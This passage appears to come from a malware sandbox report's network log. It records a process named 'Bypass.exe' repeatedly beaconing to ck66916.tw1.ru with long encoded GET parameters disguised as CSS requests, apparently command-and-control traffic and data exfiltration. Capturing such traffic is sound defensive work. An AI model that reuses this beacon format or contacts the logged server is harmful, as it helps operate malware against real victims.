/L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: ck66916.tw1.ru
Jun 23, 2024 06:55:41.188306093 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Sun, 23 Jun 2024 04:55:41 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65 Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49766	92.53.96.121	80	7004	C:\ProgramData\SoftwareDistribution\Bypass.exe

Timestamp	Bytes transferred	Direction	Data
Jun 23, 2024 06:55:46.202213049 CEST	2247	OUT	GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: ck66916.tw1.ru Connection: Keep-Alive
Jun 23, 2024 06:55:46.913162947 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Sun, 23 Jun 2024 04:55:46 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65 Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49767	92.53.96.121	80	7004	C:\ProgramData\SoftwareDistribution\Bypass.exe

Timestamp	Bytes transferred	Direction	Data
Jun 23, 2024 06:55:52.191972017 CEST	2247	OUT	GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: ck66916.tw1.ru Connection: Keep-Alive
Jun 23, 2024 06:55:52.884943008 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Sun, 23 Jun 2024 04:55:52 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65 Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye
Jun 23, 2024 06:55:53.102534056 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Sun, 23 Jun 2024 04:55:52 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65 Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49768	92.53.96.121	80	7004	C:\ProgramData\SoftwareDistribution\Bypass.exe

Timestamp	Bytes transferred	Direction	Data
Jun 23, 2024 06:55:57.906275988 CEST	2247	OUT	GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: ck66916.tw1.ru Connection: Keep-Alive
Jun 23, 2024 06:55:58.653141022 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Sun, 23 Jun 2024 04:55:58 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65 Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49769	92.53.96.121	80	7004	C:\ProgramData\SoftwareDistribution\Bypass.exe

Timestamp	Bytes transferred	Direction	Data
Jun 23, 2024 06:56:03.808964968 CEST	2247	OUT	GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: ck66916.tw1.ru Connection: Keep-Alive
Jun 23, 2024 06:56:04.500912905 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Sun, 23 Jun 2024 04:56:04 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65 Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49770	92.53.96.121	80	7004	C:\ProgramData\SoftwareDistribution\Bypass.exe

Timestamp	Bytes transferred	Direction	Data
Jun 23, 2024 06:56:09.516839981 CEST	2247	OUT	GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: ck66916.tw1.ru Connection: Keep-Alive
Jun 23, 2024 06:56:10.222587109 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Sun, 23 Jun 2024 04:56:10 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65 Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49771	92.53.96.121	80	7004	C:\ProgramData\SoftwareDistribution\Bypass.exe

Timestamp	Bytes transferred	Direction	Data
Jun 23, 2024 06:56:15.232300043 CEST	2223	OUT	GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: ck66916.tw1.ru
Jun 23, 2024 06:56:16.951023102 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Sun, 23 Jun 2024 04:56:15 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65 Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye
Jun 23, 2024 06:56:16.951039076 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Sun, 23 Jun 2024 04:56:15 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65 Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye
Jun 23, 2024 06:56:16.951045990 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Sun, 23 Jun 2024 04:56:15 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65 Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye
Jun 23, 2024 06:56:16.951052904 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Sun, 23 Jun 2024 04:56:15 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65 Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49772	92.53.96.121	80	7004	C:\ProgramData\SoftwareDistribution\Bypass.exe

Timestamp	Bytes transferred	Direction	Data
Jun 23, 2024 06:56:21.968521118 CEST	2220	OUT	GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=0VfiIiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2 [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: ck66916.tw1.ru 